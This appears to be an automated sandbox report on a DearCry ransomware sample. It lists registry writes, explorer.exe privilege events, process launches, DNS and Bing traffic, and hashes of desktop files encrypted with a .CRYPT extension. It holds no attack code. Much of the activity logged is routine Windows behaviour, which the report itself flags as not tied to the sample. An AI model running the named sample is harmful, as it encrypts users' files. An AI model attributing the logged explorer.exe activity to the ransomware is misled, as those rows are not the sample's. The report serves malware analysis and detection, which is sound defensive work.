Key created \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\Recognizers\\Tokens\\MS-1033-110-WINMO-DNN" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1750093773-264148664-1320403265-1000\{E1D6C444-D0A4-45AD-B71A-68C133EACD9F} C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance\ C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "0" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

All 64 rows below are C:\Windows\explorer.exe enabling SeShutdownPrivilege and SeCreatePagefilePrivilege in alternating pairs; the sample process listed under Processes (DearCry_13_03_2021_1292KB.exe) does not appear here, so correlate with the sample's own PID before treating this signature as privilege manipulation by the sample.

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
(this row is repeated 64 times; every hit is C:\Windows\explorer.exe with no indicator or target recorded)

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
(this row is repeated 48 times; every hit is C:\Windows\explorer.exe with no indicator or target recorded)

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe"

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 38.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 52.111.227.14:443 tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 16.173.189.20.in-addr.arpa udp

Files


C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\{03BA58C4-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db.CRYPT

MD5 741504733cb68b875aa72ec5d0627635
SHA1 b8741f20aab40cd60266c41c4e81fc6fd31630c9
SHA256 50abe2f6ca20d4429481d24e92525ce6c7ded0c6d2ff863db3aa7fbfa6b6650c
SHA512 565f38a5075f568c967b44d0f37c2700bdb857834a29bd37f3690ea8f006272d92525e7dd1e071688281b18c5c080a02eca72286bcefde0734320020397edc62

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat

MD5 3c30aab2bb30558495718034ef68f870
SHA1 f2a261989b9d8feab45b290d111a24b5c59225db
SHA256 d61f6b67da4d94d5d85dace4de2b41fb9a9e7c0d3d4131bad2b769cdd3788d1e
SHA512 6062a61fe885a397678180e71e434e8c06cd35d5f69f76054621d7f68d89036f91263e602eb76eb1ce9c43f97bc4e4c1e1d68e4beba23fadaf95b5b7613ee161

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db

MD5 4708158baf53cc8c8fd3cfdecb49977f
SHA1 2f266dbea68d3163d90df9925992b7064aefc312
SHA256 23914ffc26a90101d879bedb4ad1bc320d3459b923b6a464f2d89a7efe0d93cd
SHA512 6cead375cc42d8db877d697aaa472a7d283cf3e2ea61e87e17ea7804ea55e49eb2ed23fdcffca17db3ab2ffd4aa36706fe8a068a48d1812bf04de2e8bd9e28d1

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db

MD5 382eb55a81964f39214279e544e145ae
SHA1 11f3b41f6dd4a6eda6078b89e22b7c3ef818cb90
SHA256 5db0fdffa49651e306f20351ab01e87fab4211d3d5d514eb737ca8f42ab160e2
SHA512 ee93f169c72be31907bb7d50e7f6fd22e83c7f7f091498d19afcc23ec813b7eaa835f6c01e7a83e8e271bdde05878d098970b479b580fa85d62be296ea8e348b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

MD5 c1629d23ffbef716b620cdcd3008a801
SHA1 8d9776f44eb65cd24bb07c78d685f4b9bb099f68
SHA256 54afb4b1d190caddb313d4a172d02f4ff9a5a2caeb5806183a01bb281031ee80
SHA512 bc5ef7b414c1a61e5e9686e6cd141c3b41a99e0db7e37a1aa9ac98b74a3e26bedbef403e1c564ca7a57bd5e42ccca75b3f2c5ca2641d87bdb61848d95ec3a676

C:\USERS\ADMIN\DESKTOP\SHOWMEASURE.DOCX.CRYPT

MD5 682f9daa47699bb818b7ece4d8cae4fd
SHA1 3db0947e797dda8470725c8d2514e8a1f9893da0
SHA256 ebe0eb033230f75b0c720b2d9cfb8a17587180ff20cdef7173b021670e3b51a1
SHA512 e6708159eae6049508aa6ae683bda398fca799e97aae76f77bcf2b0d9bf9f8c248ca6324fe0ac5315627f7fbe3daec6ea58867f2af8df1da1cf61fd30b234619

C:\USERS\ADMIN\DESKTOP\REGISTEREXPORT.JS.CRYPT

MD5 317e74071329753ac00b64424ab3a04e
SHA1 640873c2f3cbb297c76ae26af632e6de4776302d
SHA256 5380ee2f5d41e592007856fbd92bb82e5563de9bdbcc61fe44d39c83c5403984
SHA512 929208c89022dea540859fd7d71a70af310e13144572d4ff6d2071cda18127244352f1f584a9b0a2e159a90f14925a61f22fc1d0aef68bcd7810960d8764ef3d

C:\USERS\ADMIN\DESKTOP\READHIDE.DOCX.CRYPT

MD5 776162c333b112b29b1da0448b7ab15d
SHA1 9abe37cfce6bd1091f3685faf36201414572bce5
SHA256 ecc2f5176160ef14d2dd5f19c145344184672a7a85cf27e8efb7afe3d82ea9a9
SHA512 54be488c39e48c3e4fd94865c4765c6dbdb9ee4c65a59fac907f357256d21bc054649c593f9ee853ab09cfac576351006f89e02518dcc6fb4a79f1eb93900253

C:\USERS\ADMIN\DESKTOP\PUBLISHGET.WPS.CRYPT

MD5 b8bd52253067f71e0e1b42f060380233
SHA1 3a7fed2700d855969e730272bcf8a082ef63395d
SHA256 edcbb01079cf44cc775f8cf70a078a19445b0e0a2b76ecae7e9f0d0f14cedec9
SHA512 2f24708fa262e8b591598ee4d524096e4cfe4246c571d1eef61c8952c085f0fa62b7a994cd4a786e150143c44797f2e0944cb1599a6f7ca411002bc9a3869089

C:\USERS\ADMIN\DESKTOP\NEWREVOKE.XLSX.CRYPT

MD5 07189b88ce47b0a27bf30d8e914f2fab
SHA1 22f41d4c150f640145484d50e312a895da77ed3e
SHA256 69b1efd779d2865db6251270f5c75ae074bd380ada40797badaae53777c92a19
SHA512 1230623f80812d8485178a804db54d1f41a1fa24e06bbf3a13e3c803f859d36f02bf544c0623d3810718e12f764e967b2d7d2945a6e99063d8617b604b06e2ca

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db

